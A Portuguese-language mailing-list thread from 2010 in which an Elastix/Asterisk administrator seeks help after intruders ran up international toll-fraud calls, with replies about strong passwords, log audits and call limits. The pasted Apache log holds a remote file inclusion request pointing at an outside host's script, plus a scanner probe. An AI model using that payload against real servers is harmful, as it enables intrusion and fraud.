Não sou a melhor pessoa para lhe responder sobre segurança no asterisk, porém tenho muitos conceitos de políticas de segurança, uma delas vc já até disse, limitar número de conexões/canais/chamadas, tem sim, uma leitura vc encontrará muitas formas de blindar o servidor.
Porém nada adianta se vc tem senhas fracas. Em 22 de novembro de 2010 14:25, Gleidison Sampaio < gleidison.samp...@hotmail.com> escreveu: > é possivel limitar a quantidade de ligaçoes simultaneas por ramal? > > > > Att; > > *Gleidison C. Sampaio* > > > ------------------------------ > From: gleidison.samp...@hotmail.com > > To: asteriskbrasil@listas.asteriskbrasil.org > Date: Mon, 22 Nov 2010 13:23:47 -0400 > > Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 > > Nielsen, > > Cara, rodei tudo quanto é coisa na maquina do cliente, essa parte foi > facil, até porque só tem uma maquina em cada filial, nao detectei nada, até > porque tem um firewall que barra tudo quanto é acesso, mais enfim o fato é > que eu gostaria de saber, o que posso fazer pra tornar mais seguro pra > evitar essas invasões. > > > > Att; > > *Gleidison C. Sampaio* > > > > ------------------------------ > From: niel...@freesolutions.com.br > Date: Mon, 22 Nov 2010 13:51:04 -0300 > To: asteriskbrasil@listas.asteriskbrasil.org > Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 > > Bom eles autenticaram numa boa ? Vc está utilizando senhas fortes ? > provavelmente eles monitoraram seu server e conseguiram uma senha ... Muito > estranho vc fez uma auditoria nos logs ? Pode ser que algum de seus clientes > esteja com trojan, este enviou as informações e no meio delas foram os dados > de autenticação. > > Pensou nisso tudo ? > > No final das contas é preciso a auditoria para identificar a origem da > invasão. > > Em 22 de novembro de 2010 13:40, Gleidison Sampaio < > gleidison.samp...@hotmail.com> escreveu: > > Sim no Elastix 1.6 > > ele se encontra em um Co-location dentro da GVT em uma maquina virtual, com > IP Publico e tenho ramais distribuidos em 5 filiais diferentes, esses ramais > estao logados atraves de Linksys SPA2102 todos estes atras de Firewall, e o > que notei no CDR foi que fizeram ligaçoes apenas um ramal, e em duas horas > durante a madrugada os caras arrebentaram de ligar. > > > > > > > > > > 2010-11-21 21:14:01 XXXX00393396976261 SIP/TRUNK SIP/TRUNKANSWERED 1045 > > > > > > > > > > Att; > > *Gleidison C. Sampaio* > > > > > > ------------------------------ > From: niel...@freesolutions.com.br > Date: Mon, 22 Nov 2010 13:27:16 -0300 > > To: asteriskbrasil@listas.asteriskbrasil.org > Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 > > > Opa, foi no seu ELASTIX 1.6? > > Qual a posição que se encontra seu servidor voip na sua rede ? > > Em 22 de novembro de 2010 13:20, Gleidison Sampaio < > gleidison.samp...@hotmail.com> escreveu: > > Sidinei, > > Obrigado pela Resposta, > > cara sofri uma invasao essa madrugada, e os caras arrebentaram de ligaçoes > para a Italia, abaixo peguei o seguinte log. e os caras fizeram um rombo. > alguem poderia me ajudar a bloquear isso. > > /var/log/httpd/access_log > > 72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] "GET /user/soapCaller.bs > HTTP/1.1" 302 305 "-" "Morfeus Fucking Scanner" > 72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] "GET > /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? > HTTP/1.1" 302 354 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" > > > > > Att; > > *Gleidison C. Sampaio* > > > > > > > ------------------------------ > From: sidnei...@ig.com.br > To: asteriskbrasil@listas.asteriskbrasil.org > Date: Mon, 22 Nov 2010 14:00:10 -0200 > Subject: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 > > Não, pois estão todas as linhas comentadas (é só um exemplo). > > *De:* asteriskbrasil-boun...@listas.asteriskbrasil.org [mailto: > asteriskbrasil-boun...@listas.asteriskbrasil.org] *Em nome de *Gleidison > Sampaio > *Enviada em:* segunda-feira, 22 de novembro de 2010 13:40 > *Para:* Asterisk Lista > *Assunto:* [AsteriskBrasil] Duvida ( SEGURANÇA ) Elastix 1.6 > > Boa tarde Lista! > > hoje fuçando nas configuraçoes do meu PBX eu abri a seguinte configuraçao, > e gostaria de saber se isso da permissao a algum acesso no meu servidor > > /etc/asterisk/users.conf > > ;[6000] > ;fullname = Joe User > ;email = j...@foo.bar > ;secret = xxxx > ;zapchan = 1 > ;hasvoicemail = yes > ;vmsecret = xxxx > ;hassip = yes > ;hasiax = no > ;hash323 = no > ;hasmanager = no > ;callwaiting = no > ;context = international > > > > > Att; > > *Gleidison C. Sampaio* > > > > > > > > > > _______________________________________________ > KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. > - Hardware com alta disponibilidade de recursos e qualidade KHOMP > - Suporte técnico local qualificado e gratuito > Conheça a linha completa de produtos KHOMP em www.khomp.com.br > _______________________________________________ > Temos tudo para seu projeto VoIP com Asterisk! > Descontos especiais para assinantes da AsteriskBrasil.org. > Registre-se e receba um cupom exclusivo de desconto! > Acesse agora www.voipmania.com.br > ______________________________________________ > Lista de discussões AsteriskBrasil.org > AsteriskBrasil@listas.asteriskbrasil.org > http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil > ______________________________________________ > Para remover seu email desta lista, basta enviar um email em branco para > asteriskbrasil-unsubscr...@listas.asteriskbrasil.org > -- At. ____________________________ Nielsen Alves de Oliveira Consultor em Sistemas Computacionais CIO Free Solutions Telefone: (65) 3025-7356 Celular: (65) 9287-5331 (Vivo)
_______________________________________________ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br _______________________________________________ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br ______________________________________________ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil ______________________________________________ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org